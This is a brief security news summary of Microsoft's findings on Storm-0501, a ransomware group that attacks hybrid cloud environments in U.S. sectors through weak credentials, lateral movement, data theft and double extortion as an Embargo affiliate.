Microsoft Identifies Storm-0501 as Major Threat in Hybrid Cloud Ransomware Attacks


The threat actor Storm-0501 has been targeting U.S. government, manufacturing, transportation, and law enforcement sectors in a multi-stage ransomware campaign. Active since 2021, the group uses weak credentials and unpatched vulnerabilities to compromise hybrid cloud environments, performing lateral movement from on-premises to cloud systems. Their operations involve data exfiltration, credential theft, and ransomware deployment. Using tools like Cobalt Strike and Rclone, they maintain persistent access and move data to cloud storage. Storm-0501, now an affiliate of the ransomware-as-a-service (RaaS) platform Embargo, employs double extortion tactics, encrypting files and threatening data leaks unless a ransom is paid.

Read More


thumb-image

Solutions